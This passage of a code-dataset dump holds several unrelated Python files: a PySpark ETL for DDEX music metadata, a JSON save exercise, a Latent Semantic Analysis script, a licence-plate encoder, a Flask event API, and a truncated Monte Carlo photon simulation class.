fields_to_preprocess=[f\"{MessageHeaderEnum.SentOnBehalfOf.value}.*\"],\n valid_source_fields=[\"PartyId\"],\n participant_type=\"SentOnBehalfOfProprietary\",\n is_main_release=True,\n spark=spark,\n relative_source_path=MESSAGE_RELEASES,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.party_id import PartyId\n from ...enums import AttributeEnum\n\n super(_SentOnBehalfOfProprietary, self)._preprocess()\n\n # noinspection PyProtectedMember\n self._source_df = self._source_df \\\n .where(f.col(\"PartyId\")._Namespace.isNotNull()) \\\n .withColumn(\n \"PartyId\",\n f.struct(\n f.lit(True)\n .astype(PartyId[AttributeEnum.IsDPID.value].dataType)\n .alias(AttributeEnum.IsDPID.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.IsISNI.value].dataType)\n .alias(AttributeEnum.IsISNI.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.col('PartyId')._Namespace\n .astype(PartyId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value),\n )\n )\n\n\nclass _ResourceOrReleaseProprietary(_TemplateRawParticipant):\n def __init__(\n self,\n id_tag: str,\n has_resource_reference: bool,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_SOUND_RECORDINGS, MESSAGE_RELEASES\n from ...enums import SoundRecordingEnum\n\n if has_resource_reference:\n fields_to_preprocess = [SoundRecordingEnum.ResourceReference.value, f\"{id_tag}.*\"]\n valid_source_fields = [SoundRecordingEnum.ResourceReference.value, \"ProprietaryId\"]\n is_main_release = False\n relative_source_path = MESSAGE_SOUND_RECORDINGS\n else:\n fields_to_preprocess = [f\"{id_tag}.*\"]\n valid_source_fields = [\"ProprietaryId\"]\n is_main_release = True\n relative_source_path = MESSAGE_RELEASES\n participant_type = f\"{id_tag.replace('Id', '')}Proprietary\"\n\n self.id_tag = id_tag\n self.has_resource_reference = has_resource_reference\n super(_ResourceOrReleaseProprietary, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=fields_to_preprocess,\n valid_source_fields=valid_source_fields,\n participant_type=participant_type,\n is_main_release=is_main_release,\n spark=spark,\n relative_source_path=relative_source_path,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.party_id import PartyId\n from ...schemas.proprietary_id import ProprietaryId\n from ...enums import AttributeEnum\n\n self._source_df = self._source_df \\\n .withColumn(self.id_tag, f.explode_outer(f.col(self.id_tag))) \\\n .where(f.col(self.id_tag).isNotNull())\n\n super(_ResourceOrReleaseProprietary, self)._preprocess()\n\n # noinspection PyProtectedMember\n self._source_df = self._source_df \\\n .withColumn(\n \"PartyId\",\n f.struct(\n f.lit(True).astype(PartyId[AttributeEnum.IsDPID.value].dataType).alias(AttributeEnum.IsDPID.value),\n f.lit(False).astype(PartyId[AttributeEnum.IsISNI.value].dataType).alias(AttributeEnum.IsISNI.value),\n f.lit(None).astype(PartyId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.col(\"ProprietaryId\")._Namespace.astype(PartyId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value),\n ).alias(\"PartyId\")\n ) \\\n .withColumn(\n \"ProprietaryId\",\n f.struct(\n f.lit(None).astype(ProprietaryId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.lit(None).astype(ProprietaryId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value),\n )\n )\n\n self._valid_source_fields.pop(self._valid_source_fields.index(\"ProprietaryId\"))\n self._valid_source_fields.append(\"PartyId\")\n\n\nclass _IndirectSoundRecordingProprietary(_ResourceOrReleaseProprietary):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_IndirectSoundRecordingProprietary, self).__init__(\n id_tag=SoundRecordingEnum.IndirectSoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SoundRecordingProprietary(_ResourceOrReleaseProprietary):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingProprietary, self).__init__(\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n spark=spark,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n\nclass _ReleaseProprietary(_ResourceOrReleaseProprietary):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import ReleaseEnum\n\n super(_ReleaseProprietary, self).__init__(\n id_tag=ReleaseEnum.ReleaseId.value,\n has_resource_reference=False,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _Label(_TemplateRawParticipant):\n def __init__(\n self,\n has_resource_reference: bool,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_SOUND_RECORDINGS, MESSAGE_RELEASES\n from ...enums import ReleaseEnum, SoundRecordingEnum\n\n if has_resource_reference:\n details_by_territory_tag = SoundRecordingEnum.SoundRecordingDetailsByTerritory.value\n fields_to_preprocess = [SoundRecordingEnum.ResourceReference.value, f\"{details_by_territory_tag}.*\"]\n valid_source_fields = [SoundRecordingEnum.ResourceReference.value, \"LabelName\"]\n participant_type = \"SoundRecordingLabel\"\n is_main_release = False\n relative_source_path = MESSAGE_SOUND_RECORDINGS\n else:\n details_by_territory_tag = ReleaseEnum.ReleaseDetailsByTerritory.value\n fields_to_preprocess = [f\"{details_by_territory_tag}.*\"]\n valid_source_fields = [\"LabelName\"]\n participant_type = \"ReleaseLabel\"\n is_main_release = True\n relative_source_path = MESSAGE_RELEASES\n\n self.details_by_territory_tag = details_by_territory_tag\n super(_Label, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=fields_to_preprocess,\n valid_source_fields=valid_source_fields,\n participant_type=participant_type,\n is_main_release=is_main_release,\n spark=spark,\n relative_source_path=relative_source_path,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n self._source_df = self._source_df \\\n .withColumn(self.details_by_territory_tag, f.explode_outer(f.col(self.details_by_territory_tag))) \\\n .where(f.col(self.details_by_territory_tag).isNotNull())\n\n super(_Label, self)._preprocess()\n\n\nclass _SoundRecordingLabel(_Label):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n super(_SoundRecordingLabel, self).__init__(\n has_resource_reference=True,\n tenant_path=tenant_path,\n input_file=input_file,\n specification_file=specification_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _ReleaseLabel(_Label):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n super(_ReleaseLabel, self).__init__(\n has_resource_reference=False,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _ArtistOrResourceContributor(_TemplateRawParticipant):\n def __init__(\n self,\n artist_or_resource_contributor_tag: str,\n id_tag: str,\n has_resource_reference: bool,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_SOUND_RECORDINGS, MESSAGE_RELEASES\n from ...enums import AttributeEnum, SoundRecordingEnum\n\n role_tag = artist_or_resource_contributor_tag \\\n if artist_or_resource_contributor_tag != \"DisplayArtist\" \\\n else \"Artist\"\n role_tag = f\"{role_tag}Role\"\n if has_resource_reference:\n fields_to_preprocess = [\n SoundRecordingEnum.ResourceReference.value, f\"{artist_or_resource_contributor_tag}.*\", f\"{id_tag}.*\"\n ]\n valid_source_fields = [\n SoundRecordingEnum.ResourceReference.value, \"PartyId\", \"PartyName\",\n \"Nationality\", role_tag, AttributeEnum.SequenceNumber.value,\n \"ProprietaryId\"\n ]\n is_main_release = False\n relative_source_path = MESSAGE_SOUND_RECORDINGS\n else:\n fields_to_preprocess = [f\"{artist_or_resource_contributor_tag}.*\", f\"{id_tag}.*\"]\n valid_source_fields = [\n \"PartyId\", \"PartyName\",\n \"Nationality\", role_tag, AttributeEnum.SequenceNumber.value,\n \"ProprietaryId\"\n ]\n is_main_release = True\n relative_source_path = MESSAGE_RELEASES\n participant_type = f\"{id_tag.replace('Id', '')}{artist_or_resource_contributor_tag}\"\n details_by_territory_tag = id_tag.replace(\"Id\", \"DetailsByTerritory\")\n\n self.artist_or_resource_contributor_tag = artist_or_resource_contributor_tag\n self.id_tag = id_tag\n self.role_tag = role_tag\n self.details_by_territory_tag = details_by_territory_tag\n self.has_resource_reference = has_resource_reference\n super(_ArtistOrResourceContributor, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=fields_to_preprocess,\n valid_source_fields=valid_source_fields,\n participant_type=participant_type,\n is_main_release=is_main_release,\n spark=spark,\n relative_source_path=relative_source_path,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n self._source_df = self._source_df \\\n .withColumn(self.id_tag, f.explode_outer(f.col(self.id_tag))) \\\n .withColumn(self.details_by_territory_tag, f.explode_outer(f.col(self.details_by_territory_tag))) \\\n .where(f.col(self.details_by_territory_tag).isNotNull()) \\\n .withColumn(\n self.artist_or_resource_contributor_tag,\n f.explode_outer(f.col(f\"{self.details_by_territory_tag}.{self.artist_or_resource_contributor_tag}\"))\n ) \\\n .drop(f.col(self.details_by_territory_tag)) \\\n .where(f.col(self.artist_or_resource_contributor_tag).isNotNull())\n\n super(_ArtistOrResourceContributor, self)._preprocess()\n\n\nclass _SoundRecordingIndirectResourceContributor(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingIndirectResourceContributor, self).__init__(\n artist_or_resource_contributor_tag=\"IndirectResourceContributor\",\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SoundRecordingResourceContributor(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingResourceContributor, self).__init__(\n artist_or_resource_contributor_tag=\"ResourceContributor\",\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SoundRecordingDisplayArtist(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingDisplayArtist, self).__init__(\n artist_or_resource_contributor_tag=\"DisplayArtist\",\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _ReleaseDisplayArtist(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import ReleaseEnum\n\n super(_ReleaseDisplayArtist, self).__init__(\n artist_or_resource_contributor_tag=\"DisplayArtist\",\n id_tag=ReleaseEnum.ReleaseId.value,\n has_resource_reference=False,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass RawParticipant:\n from ...relative_path import PARTICIPANT_RAW\n\n template_raw_participant_classes = [\n _MessageRecipient,\n _MessageSender,\n _SentOnBehalfOf,\n _SentOnBehalfOfProprietary,\n _IndirectSoundRecordingProprietary,\n _SoundRecordingProprietary,\n _ReleaseProprietary,\n _SoundRecordingLabel,\n _ReleaseLabel,\n _SoundRecordingIndirectResourceContributor,\n _SoundRecordingResourceContributor,\n _SoundRecordingDisplayArtist,\n _ReleaseDisplayArtist\n ]\n\n def __init__(\n self,\n tenant_path: str,\n relative_target_path: str = PARTICIPANT_RAW,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n self._spark: tp.Optional[SparkSession] = spark\n self._tenant_path: str = tenant_path\n self._relative_target_path: str = relative_target_path\n self._specification_file: tp.Optional[str] = specification_file\n self._input_file: tp.Optional[tp.Union[str, tp.List[str]]] = input_file\n self._config: tp.Optional[tp.Dict[str, tp.Any]] = config\n self._config_file: tp.Optional[str] = config_file\n self._objs: tp.List[_TemplateRawParticipant] = []\n self._target_df: tp.Optional[DataFrame] = None\n\n @property\n def target_df(self) -> tp.Optional[DataFrame]:\n return self._target_df\n\n @target_df.setter\n def target_df(self, df: DataFrame) -> tp.NoReturn:\n if not self._target_df:\n self._target_df = df\n else:\n self._target_df = self._target_df.union(df)\n\n def persist(self) -> tp.NoReturn:\n for cls in self.template_raw_participant_classes:\n obj = cls(tenant_path=self._tenant_path,\n specification_file=self._specification_file,\n input_file=self._input_file,\n spark=self._spark,\n config=self._config,\n config_file=self._config_file)\n\n obj.persist()\n self._objs.append(obj)\n self.target_df = obj.target_df\n\n def unpersist(self) -> tp.NoReturn:\n self._target_df.unpersist()\n for obj in self._objs:\n obj.unpersist()\n\n def write(self) -> tp.NoReturn:\n from dependencies.utils import get_table_path\n from ...enums import CustomFieldEnum\n\n path = get_table_path(self._tenant_path,\n self._relative_target_path,\n partition_name=CustomFieldEnum.SpecificationFileName.value,\n partition_value=self._specification_file)\n\n self.target_df \\\n .where(f.coalesce(f.col(\"LabelName\"),\n f.col(\"FullName\")).isNotNull()) \\\n .repartition(f.col(\"Type\")) \\\n .sortWithinPartitions(f.col(CustomFieldEnum.MessageRange.value)) \\\n .write \\\n .mode(\"overwrite\") \\\n .partitionBy(\"Type\") \\\n .parquet(path)\n","repo_name":"fradriz/vi_sources_etl","sub_path":"jobs/ddex/mappings/participants/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":46371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71871984800","text":"\"\"\"\nExercício - Salve sua classe em JSON\nSalve os dados da sua classe em JSON\ne depois crie novamente as instâncias\nda classe com os dados salvos\nFaça em arquivos separados.\n\"\"\"\nimport json\nclass Carro:\n def __init__(self, nome, cor):\n self.nome = nome\n self.cor = cor\n\n def salvar_json(objeto):\n with open('Modulo_3_Introducao_Programacao_Orientada_Objeto\\\\Exercicios\\\\Exercicio_JSON\\\\classe.json', 'w+') as file:\n json.dump(objeto, file, indent=2)\n\ncar = Carro('Ford', 'Vermelho')\ncar2 = Carro('Fiat', 'Preto')\ncar3 = Carro('Kia', 'Azul')\nbd = [vars(car),vars(car2),vars(car3)]\n\nCarro.salvar_json(bd)\n","repo_name":"FreeWillieVitin/Curso_Python","sub_path":"Modulo_3_Introducao_Programacao_Orientada_Objeto/Exercicios/1_Salvar_Classe_em_JSON.py","file_name":"1_Salvar_Classe_em_JSON.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34665141072","text":"# -*- coding: utf-8 -*-\n\nimport numpy\nimport argparse\nfrom textProcessor import textProcessor\nfrom Stemmer import Stemmer\nimport random\nfrom FileCryptor import FileCryptor\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.decomposition import PCA\n\nparser = argparse.ArgumentParser(description='File path parser')\nparser.add_argument('--source', '-s', type=str, required=True, help='Путь к файлу или папке с документами')\nparser.add_argument('--dest', '-d', type=str, help='Место сохранения итоговых данных')\nparser.add_argument('--freq', '-f', default=1, type=int, help='Если слово встречактся в документе больше раз, чем'\n ' задано здесь, то оно подлежит удалению')\nparser.add_argument('--pca', action='store_true', help='Если активировать этот ключ, то будет срабатывать'\n 'анализ главных компонент перед отбором признаков')\n\n\ndef plotGraphic(docs, terms, keys, pca=False):\n fig = plt.figure()\n axes = Axes3D(fig)\n\n if(pca == False):\n docs = docs.transpose()\n # x = numpy.arange(-1, 1, 0.1)\n # y = numpy.arange(-1, 1, 0.1)\n # xgrid, ygrid = numpy.meshgrid(x, y)\n # axes.plot_surface(xgrid, ygrid, 0, color='b', alpha='0.33')\n\n i = 1\n for doc in docs:\n axes.scatter(doc[0], doc[1], doc[2], color='b', edgecolor='k')\n axes.plot([doc[0], doc[0]], [doc[1], doc[1]], zs=[doc[2], 0], color='k',\n dashes=[8, 4, 2, 4, 2, 4])\n axes.text(doc[0], doc[1], doc[2], str(i))\n i += 1\n\n j = 0\n for term in terms:\n axes.scatter(term[0], term[1], term[2], color='r', edgecolor='k')\n axes.plot([term[0], term[0]], [term[1], term[1]], zs=[term[2], 0], color='k',\n dashes=[8, 4, 2, 4, 2, 4])\n shift = random.uniform(0.05, 0.1)\n axes.text(term[0], term[1], term[2]+shift, str(keys[j]))\n j += 1\n\n\nargs = parser.parse_args()\n\nwords = []\n\nsource = args.source\ndest = args.dest\nfreq = args.freq\npca = args.pca\n\n# if str(source.find('.txt')) == -1:\nif source[-3:len(source)] != 'txt':\n for k in range(1, 8):\n f = open(source +'/Doc' + str(k) + '.txt',encoding='utf-8')\n # f = open('mydoc\\\\T'+str(i)+'.txt')\n words.append(f.read())\nelse:\n f = open(source,encoding='utf-8')\n # f = open('text2.txt')\n for line in f.readlines():\n words.append(line.strip())\n\nTP = textProcessor()\nST = Stemmer()\n\nwords = [w.lower() for w in words] # Переводим все строки в нижний регистр\nwords = TP.remove_symbols(words) # Удаляем стоп-символы\nwords = TP.remove_stopwords(words) # Удаляем стоп-слова\n# print(words)\n\nstemmed = []\nfor sentence in words:\n s = [ST.stem(i) for i in sentence] # Производится стемминг\n stemmed.append(s)\n# print(stemmed)\n\nkeys = TP.remove_unique(stemmed, freq) # Удаление слов, встречающихся во всех документах более freq раз/\n# print(keys) # По умолчанию частота freq=1 равна еденице\n# print(len(keys)) # Получаем массив ключевых слов - термов\n\ntable, disp_table = TP.table_generator(keys, stemmed) # Формируем частотную матрицу - table\n# print(disp_table) # И таблицу частоты встречаемости - disp_table\n\n# Сингулярное разложение\nLA = numpy.linalg\nfreqMatrix = numpy.array(table)\n# print(freqMatrix)\nterms, s, docs = LA.svd(freqMatrix, full_matrices=False)\nassert numpy.allclose(freqMatrix, numpy.dot(terms, numpy.dot(numpy.diag(s), docs)))\n# s[2:] = 0\nnew_a = numpy.dot(terms, numpy.dot(numpy.diag(s), docs))\n\n# Вывод графика и Анализ главных компонент, если требуется\nif(pca):\n pca = PCA(n_components=3)\n fit_docs = pca.fit_transform(docs)\n fit_terms = pca.fit_transform(terms)\n print(fit_terms)\n print(' ')\n print(fit_docs)\n print(' ')\n plotGraphic(fit_docs, fit_terms, keys, pca=True)\nelse:\n print(terms)\n print(' ')\n print(s)\n print(' ')\n print(docs)\n print(' ')\n plotGraphic(docs, terms, keys)\n\n\nif(pca):\n termCords = fit_terms # Для разложения с анализом главных компонент\n docCords = fit_docs\nelse:\n termCords = [line[:3] for line in terms] # Для обычного разложения\n docCords = [line[:3] for line in docs.transpose()]\n\n\n# Расчитаем расстояния до всех термов от каждого документа\n # Результаты расчётов поместим в словарь словарей statistics\nstatistics = {} # В нём по номеру документа хранятся словари из пар- (терм: расстояние от терма до данного документа)\nindex = 0 # Получим наглядный словарь по расстояниям от каждого терма до каждого документа\nfor doc in docCords:\n k = 0\n distDictionary = {}\n for term in termCords:\n dist = numpy.sqrt(((float(term[0])-float(doc[0]))**2)+((float(term[1])-float(doc[1]))**2)+((float(term[2])-float(doc[2]))**2))\n distDictionary[keys[k]] = dist\n k += 1\n statistics[index+1] = distDictionary\n index += 1\n\n\n # Теперь отсортируем каждый словарь из statistics по возрастанию расстояния от документа до терма\nl = lambda x: -x[1] # Таким образом получим упорядоченные списки, где первые термы больше всего соответсвуют\nindex = 1 # данному документу.\nwww = []\nwhile index <= statistics.__len__():\n end = sorted(statistics[index].items(), key=l, reverse=True)\n print(index, end[:5]) # Из всех значений термов ��ля каждого документа оставим 5 наиболее длизких по расстоянию\n end_word_list = dict(end[:5]) # И выведем их\n www.append(list(end_word_list.keys()))\n index += 1\n\n\nsss = set() # Теперь составим множество всех термов, которые находятся по отношению к своим документам в\nfor list in www: # пятёрке наиболее близких и выведем их\n for item in list:\n sss.add(item)\nprint(sss) # Это и будут термы, наиболее точно передающие тему и смысл всего набора документов, т.е. текста\n\n# Выводим информацию об анализе в файл\nif dest is not None:\n print(dest)\n plt.savefig(dest+'/graphic', fmt='png')\n with open(dest+r'/results.txt', 'w+', encoding='utf-8') as f:\n k = 0\n j = 0\n f.write('Матрица термы-на-документы\\n')\n for line in disp_table:\n f.write(str(line[::-1])+'\\n')\n\n if(pca):\n f.write('Координаты термов\\n')\n for line in fit_terms:\n f.write(str(line[:3]) + keys[k] + '\\n')\n k += 1\n f.write('Координаты документов\\n')\n for line in fit_docs.transpose(): # Матрица с коорд. документов транспонирована для лучшего вывода\n f.write(str(line[:3]) + 'Doc#' + str(j + 1) + '\\n')\n j += 1\n else:\n f.write('Координаты термов\\n')\n for line in terms:\n f.write(str(line[:3]) + keys[k] + '\\n')\n k += 1\n f.write('Координаты документов\\n')\n for line in docs.transpose(): # Матрица с коорд. документов транспонирована для лучшего вывода\n f.write(str(line[:3])+'Doc#'+str(j+1)+'\\n')\n j += 1\n f.write(str(sss))\n f.close()\n\nplt.show()","repo_name":"Inquient/Diploma---LSA-on-python","sub_path":"LSA.py","file_name":"LSA.py","file_ext":"py","file_size_in_byte":8853,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26160167938","text":"\nclass Plaque:\n \"\"\" Plaque d'immatriculation française\n Représentation numérique et au format AA-001-AA\n \"\"\"\n _iplaque: int = 0\n\n def increment(self, i: int) -> None:\n self._iplaque += i\n \n def _itos(self) -> str:\n i = self._iplaque\n\n n = i % 999\n i //= 999\n d = i % 26\n i //= 26\n c = i % 26\n i //= 26\n b = i % 26\n a = i // 26\n\n aa = chr(a + 65)\n bb = chr(b + 65)\n cc = chr(c + 65)\n dd = chr(d + 65)\n nn = str(n + 1).zfill(3)\n\n return f'{aa}{bb}-{nn}-{cc}{dd}'\n\n def _stoi(self, s: str) -> int:\n a = ord(s[0]) - 65 # int representation of Za-001-aa\n b = ord(s[1]) - 65 # etc.\n c = ord(s[-2]) - 65 # etc.\n d = ord(s[-1]) - 65 # int representation of aa-001-aZ\n n = int(s[3:6]) - 1\n\n return (((a * 26 + b) * 26 + c) * 26 + d) * 999 + n\n\n def __init__(self, s) -> None:\n self._iplaque = self._stoi(s)\n\n def __str__(self) -> str:\n return self._itos()\n\n","repo_name":"niavlys34/Codingame-Solutions","sub_path":"car_license.py","file_name":"car_license.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12191245546","text":"from flask import request\nfrom werkzeug.exceptions import BadRequest\n\nfrom client_action_tracker.app_setup import create_app\n\napp, service = create_app()\n\n\n@app.route('/')\ndef home():\n return service.hello_world()\n\n\n@app.route('/events', methods=['GET', 'POST'])\ndef event():\n data = request.get_json()\n\n api_key = request.headers.get('api-key')\n if not api_key:\n return {'status': 'error', 'description': 'no api key'}, 400\n\n events = data.get('events')\n if not events:\n raise BadRequest(\"Missing 'events' field\")\n\n service.create_events(events, api_key)\n return {'status': 'success'}, 200\n","repo_name":"yujinjcho/client_action_tracker","sub_path":"api/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10842931339","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 28 15:47:12 2021\n\n@author: Luigi Belcastro - Linköping University\nemail: luigi.belcastro@liu.se\n\nClass to represent photon packets\n\"\"\"\nimport numpy as np\nfrom operator import attrgetter # used to find maximum attribute\n\nclass Photon:\n \"\"\"Class to represent photon packets\"\"\"\n def __init__(self, **kwargs):\n self.coordinates = np.array([0,0,0], dtype=float) # in mm. Default to axis origin\n self.direction = np.array([0,0,1], dtype=float) # default to positive z direction\n self.weigth = 1.0 # photon packet weigth\n self.spec = 0 # specular reflection at the surface\n self.dead = False # flag to check photon termination\n self.detected = False # Flag to determine if a photon is detected\n self.step_size = 0 # step size (in mm). Update at every iteration\n self.scatters = 0 # number of scattering events\n self.path = [] # to store photon path\n self.pathlength = 0 # to store total pathlength\n self.roulette_step = 0 # tracker for pathlength roulette\n self.angles = [] # to store scattering directions\n self.layers = [] # DEBUG to store current layer index\n \n def step(self, tissue):\n \"\"\"\n Generate random step size\n \n Parameters\n ----------\n tissue : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n\n Returns\n -------\n step : FLOAT\n step size in mm\n \"\"\"\n step = -np.log(np.random.rand()) / (tissue.mua + tissue.mus)\n return step\n \n def absorb(self, tissue):\n \"\"\"\n Calculate absorbption and decrease photon weigth\n\n Parameters\n ----------\n tissue : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n\n Returns\n -------\n dw : FLOAT\n absorbed photon weigth\n \"\"\"\n w1 = self.weigth * tissue.mus / (tissue.mua + tissue.mus) # new weigth\n dw = self.weigth - w1 # absorbed weigth\n self.weigth = w1 # update weight\n return dw\n \n def scatter(self, tissue):\n \"\"\"\n Calculate new direction after scattering\n\n Parameters\n ----------\n tissue : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n\n Returns\n -------\n new_dir : FLOAT ARRAY\n new scattering direction\n \"\"\"\n mux, muy, muz = self.direction.copy() # unpack components for convenience\n cos_theta, phi = tissue.phaseFunction.getAngles() # randomly sample scattering angles\n # Save some values to optimize (trigonometric functions are expensive)\n temp = np.sqrt(1-muz**2)\n sin_theta = np.sqrt(1 - cos_theta**2)\n cos_phi = np.cos(phi)\n # sin_phi = np.sin(phi)\n if phi <= np.pi: # new approach, sqrt is less expensive than sin\n sin_phi = np.sqrt(1 - cos_phi**2)\n else:\n sin_phi = -np.sqrt(1 - cos_phi**2)\n\n if np.abs(muz) < 0.99:\n # OLD approach\n new_dir = np.array([\n sin_theta/temp * (mux*muz*cos_phi - muy*sin_phi) + mux*cos_theta, # mux'\n sin_theta/temp * (muy*muz*cos_phi + mux*sin_phi) + muy*cos_theta, # muy'\n 